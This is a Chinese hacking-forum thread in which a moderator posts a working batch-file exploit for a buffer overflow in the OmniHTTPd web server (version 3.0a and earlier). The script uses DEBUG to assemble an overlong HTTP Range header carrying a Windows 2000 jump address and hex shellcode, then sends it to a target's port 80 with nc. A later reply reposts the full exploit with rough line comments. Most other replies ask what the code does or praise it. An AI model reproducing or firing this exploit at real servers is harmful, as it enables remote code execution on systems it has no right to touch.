论坛: 黑客进阶 标题: bat写的exploit 复制本贴地址    
作者: yimarong [yimarong]    版主   登录
@echo off
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:Application: OmniHTTPd
:Vendors: http://www.omnicron.ca
:Version: <=V3.0a
:Platforms: Windows
:Bug: Overflow
:Date: 2004-04-23
:Author: CoolICE
:E-mail: CoolICE#China.com
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;if '%1'=='' echo Usage:%0 target&&goto :eof
;for %%n in (nc.exe) do if not exist %%~$PATH:n if not exist nc.exe echo Need nc.exe&&goto :eof
;DEBUG < %~s0
;GOTO :run

e 100 "GET / HTTP/1.0" 0D 0A "Range: "
!Overflow@length>0xE0
f 117 206 41
!JMPESP@w2k
e 207 12 45 FA 7F
!Shellcode
e 20B EB 1B 5B BE 43 6F 6F 6C BF 49 43 45 21 43 39 3B
e 21B 75 FB 4B 80 33 88 39 73 FC 75 F7 EB 09 E8 E0 FF
e 22B FF FF 43 6F 6f 6C 61 31 88 88 88 D6 60 CE 88 88
e 23B 88 01 8E 03 50 DB E0 F6 50 6A FB 60 C4 88 88 88
e 24B 01 CE 80 DB E0 06 C6 86 64 60 B6 88 88 88 01 CE
e 25B 8C E0 BB BA 88 88 E0 DD DB CD DA DC 77 58 01 CE
e 26B 84 03 50 DB E0 07 6E AC DF 60 96 88 88 88 01 CE
e 27B 98 77 DE 98 77 DE 80 DE EC 29 B8 88 88 88 03 C8
e 28B 84 03 F8 94 25 03 C8 80 D6 4A 8C 88 DB DD DE DF
e 29B 03 E4 AC 90 03 CD B4 03 DC 8D F0 8B 5D 03 C2 90
e 2AB 03 D2 A8 8B 55 6B BA C1 03 BC 03 8B 7D BB 77 74
e 2BB BB 48 24 B2 4C FC 8F 49 47 85 8B 70 63 7A B3 F4
e 2CB AC 9C FD 69 03 D2 AC 8B 55 EE 03 84 C3 03 D2 94
e 2DB 8B 55 03 8C 03 8B 4D 63 8A BB 48 03 5D D7 D6 D5
e 2EB D3 4A 80 88 60 CA 77 77 77 49 43 45 21 0D 0A 0D
E 2FB 0A 00
rcx
1FC
nhttp.tmp
w
q


:run
nc %1 80 < http.tmp
del http.tmp

地主 发表时间: 04-07-17 00:17
回复: cg2327 [cg2327]      登录
根本不懂!
版主可不可以帮小弟找一些BAT脚本入门的资料!
在这里就谢谢了?!

B1层 发表时间: 04-07-17 22:56
回复: ellak [ellak]   论坛用户   登录
2楼的说的对啊~~~~~~~~

B2层 发表时间: 04-07-18 17:25
回复: sugar [sugar]   论坛用户   登录
成功率太底了`

B3层 发表时间: 04-07-20 15:21
回复: haounix [haounix]   论坛用户   登录
一个好的程序加点解释

B4层 发表时间: 04-07-22 20:58
回复: zqbaicai [zqbaicai]   论坛用户   登录
楼主给点注释好么?看不太懂,同意2楼!

B5层 发表时间: 04-07-22 21:06
回复: yimarong [yimarong]   版主   登录
goto 将dos控制转至批处理文件中带标号的行

    goto [:] label      (标号)

if    在批处理程序中执行条件处理过程,

          if [not] exist filespec command

          if [not] string1==string2 command

    not 表示只有在条件为假时,dos才执行命令。

    Exist filespec 如果指定的条件存在,确定条件为真

    Command 满足条件时要执行的命令,

    string1==string2 若指定的正文段字符串相同,条件为真
“e” 是汇编写入

网上资料多的是,下次自己找去!
这次是我正好在研究DOS的环境变量因而有点资料,再有这种情况肯定没人离!

B6层 发表时间: 04-07-22 21:29
回复: pula [pula]   论坛用户   登录


B7层 发表时间: 04-07-23 01:21
回复: eagle_1 [eagle_1]   论坛用户   登录


B8层 发表时间: 04-07-23 03:07
回复: lghui [lghui]   论坛用户   登录


B9层 发表时间: 04-07-23 09:35
回复: ljfgl [ljfgl]   论坛用户   登录
想问嘶风版主一个问题,删除除了e:\mu目录之外的所有目录的批处理怎么写?

B10层 发表时间: 04-08-05 19:43
回复: zbasic [zbasic]   论坛用户   登录
@echo off                                            '回显
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:Application: OmniHTTPd
:Vendors: http://www.omnicron.ca
:Version: <=V3.0a
:Platforms: Windows
:Bug: Overflow
:Date: 2004-04-23
:Author: CoolICE
:E-mail: CoolICE#China.com
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;if '%1'=='' echo Usage:%0 target&&goto :eof      '前面的:是标示符.如果变量%1为空 显示usage:%0  target  然后跳转到:eof
;for %%n in (nc.exe) do if not exist %%~$PATH:n if not exist nc.exe echo Need nc.exe&&goto :eof          ' 通过程序nc.exe循环处理  变量%%n中的值 .如果在当前路径中找不到nc.exe则显示neet nc.exe并跳转到:eof
               
;DEBUG < %~s0              ' debug是dos下的调试追踪工具.这句我也不是很懂.应该是输入%~s0这个值到debug中
;GOTO :run                ' 运行debug

e 100 "GET / HTTP/1.0" 0D 0A "Range: "    '通过debug的e命令传送"GET / HTTP/1.0" 0D 0A "Range: "                              '不懂
!Overflow@length>0xE0                    '溢出字段
f 117 206 41
!JMPESP@w2k                                '应该是选择操作系统为2k
e 207 12 45 FA 7F
!Shellcode                                '发送溢出代码.
e 20B EB 1B 5B BE 43 6F 6F 6C BF 49 43 45 21 43 39 3B
e 21B 75 FB 4B 80 33 88 39 73 FC 75 F7 EB 09 E8 E0 FF
e 22B FF FF 43 6F 6f 6C 61 31 88 88 88 D6 60 CE 88 88
e 23B 88 01 8E 03 50 DB E0 F6 50 6A FB 60 C4 88 88 88
e 24B 01 CE 80 DB E0 06 C6 86 64 60 B6 88 88 88 01 CE
e 25B 8C E0 BB BA 88 88 E0 DD DB CD DA DC 77 58 01 CE
e 26B 84 03 50 DB E0 07 6E AC DF 60 96 88 88 88 01 CE
e 27B 98 77 DE 98 77 DE 80 DE EC 29 B8 88 88 88 03 C8
e 28B 84 03 F8 94 25 03 C8 80 D6 4A 8C 88 DB DD DE DF
e 29B 03 E4 AC 90 03 CD B4 03 DC 8D F0 8B 5D 03 C2 90
e 2AB 03 D2 A8 8B 55 6B BA C1 03 BC 03 8B 7D BB 77 74
e 2BB BB 48 24 B2 4C FC 8F 49 47 85 8B 70 63 7A B3 F4
e 2CB AC 9C FD 69 03 D2 AC 8B 55 EE 03 84 C3 03 D2 94
e 2DB 8B 55 03 8C 03 8B 4D 63 8A BB 48 03 5D D7 D6 D5
e 2EB D3 4A 80 88 60 CA 77 77 77 49 43 45 21 0D 0A 0D
E 2FB 0A 00
rcx
1FC
nhttp.tmp
w
q

                                              '前面的都是一些debug命令操作.我也不是很懂.只知道d是读取某段内存中地址数据.
:run
nc %1 80 < http.tmp                            '用nc 连接80端口
del http.tmp                                    '删掉http.tmp这个文件


知道的也就这么多了。希望那位懂的把他补充一下。


B11层 发表时间: 04-08-10 16:35
回复: hackerjune [hackerjune]   论坛用户   登录

不错哦

B12层 发表时间: 04-09-19 11:17
回复: raojianhua [raojianhua]   论坛用户   登录
请问这个代码的作用是什么啊!!


B13层 发表时间: 05-01-21 18:18
回复: BrideX [bridex]   论坛用户   登录
有时间再看,先收藏着

B14层 发表时间: 05-03-02 10:37
回复: DaemonTools [a7611679_]   论坛用户   登录
看了!不错!

B15层 发表时间: 05-03-13 15:14

论坛: 黑客进阶

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号